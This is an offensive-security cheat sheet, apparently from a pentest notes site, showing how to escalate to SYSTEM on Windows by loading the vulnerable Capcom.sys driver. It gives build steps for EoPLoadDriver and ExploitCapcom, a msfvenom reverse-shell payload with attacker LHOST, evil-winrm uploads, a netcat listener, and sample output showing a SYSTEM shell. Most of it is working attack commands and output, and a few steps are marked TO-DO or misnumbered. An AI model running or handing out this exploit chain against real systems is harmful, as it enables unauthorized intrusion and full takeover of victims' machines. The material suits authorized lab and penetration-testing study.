Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Abuse #1: Install malicious driver
1. Compile eoploaddriver
+---------------------------------------------------------------------------------------+
| 1. Open Visual Studio 2022 |
| 2. Create a new project |
| 3. Project Template : C++ Console App |
| 4. Project Name : Eoploaddriver |
| 5. Replace code : eoploaddriver.cpp |
| 6. Remove header : `include "stdafx.h"` |
| 7. Release -> x64 |
| 8. Build -> Build Solution |
| 9. Exported to C:\Users\user\source\repos\Eoploaddriver\x64\Release\Eoploaddriver.exe |
+---------------------------------------------------------------------------------------+
Sample Output:
TO-DORef: eoploaddriver.cpp
2. Download Capcom.sys
3. Compile ExploitCapcom
+----------------------------------------------------------------------------------------+
| 1. Double click ExploitCapcom.sln |
| 2. Replace the payload to `TCHAR CommandLine[] = TEXT("C:\\ProgramData\\rev.exe");` |
| 3. Release -> x64 |
| 4. Build -> Build Solution |
| 5. Exported to .\x64\Release\ExploitCapcom.exe |
+----------------------------------------------------------------------------------------+
Sample Output:
TO-DORef: ExploitCapcom
3. Create stageless payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f exe -o rev.exe
Sample Output:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.31 LPORT=1337 -f exe -o rev.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: rev.exe
4. Upload
# For example (evil-winrm)
upload EoPLoadDriver.exe C:\ProgramData\EoPLoadDriver.exe
Sample Output:
*Evil-WinRM* PS C:\programdata> upload EoPLoadDriver.exe C:\ProgramData\EoPLoadDriver.exe
Info: Uploading /home/kali/EoPLoadDriver.exe to C:\ProgramData\EoPLoadDriver.exe
Data: 20480 bytes of 20480 bytes copied
Info: Upload successful!
upload Capcom.sys C:\ProgramData\Capcom.sys
Sample Output:
*Evil-WinRM* PS C:\programdata> upload Capcom.sys C:\ProgramData\Capcom.sys
Info: Uploading /home/kali/Capcom.sys to C:\ProgramData\Capcom.sys
Data: 14100 bytes of 14100 bytes copied
Info: Upload successful!
upload ExploitCapcom.exe C:\ProgramData\ExploitCapcom.exe
Sample Output:
*Evil-WinRM* PS C:\programdata> upload ExploitCapcom.exe
Info: Uploading /home/kali/ExploitCapcom.exe to C:\programdata\ExploitCapcom.exe
Data: 335188 bytes of 335188 bytes copied
upload rev.exe C:\ProgramData\rev.exe
Sample Output:
*Evil-WinRM* PS C:\programdata> upload rev.exe C:\ProgramData\rev.exe
Info: Uploading /home/kali/rev.exe to C:\ProgramData\rev.exe
Data: 9556 bytes of 9556 bytes copied
Info: Upload successful!
5. Exploit
# Start a nc listener
rlwrap nc -lvnp <LOCAL_PORT>
Sample Output:
$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.193] 49855
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\programdata>whoami
whoami
nt authority\system
C:\ProgramData\Eoploaddriver.exe System\CurrentControlSet\test C:\ProgramData\Capcom.sys
Sample Output:
*Evil-WinRM* PS C:\programdata> C:\ProgramData\ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000001937C0C0008
[+] Shellcode was executed
[+] Token stealing was successful
[-] CreateProcess() failed
C:\ProgramData\ExploitCapcom.exe
Sample Output:
*Evil-WinRM* PS C:\programdata> C:\ProgramData\ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 00000221D2140008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program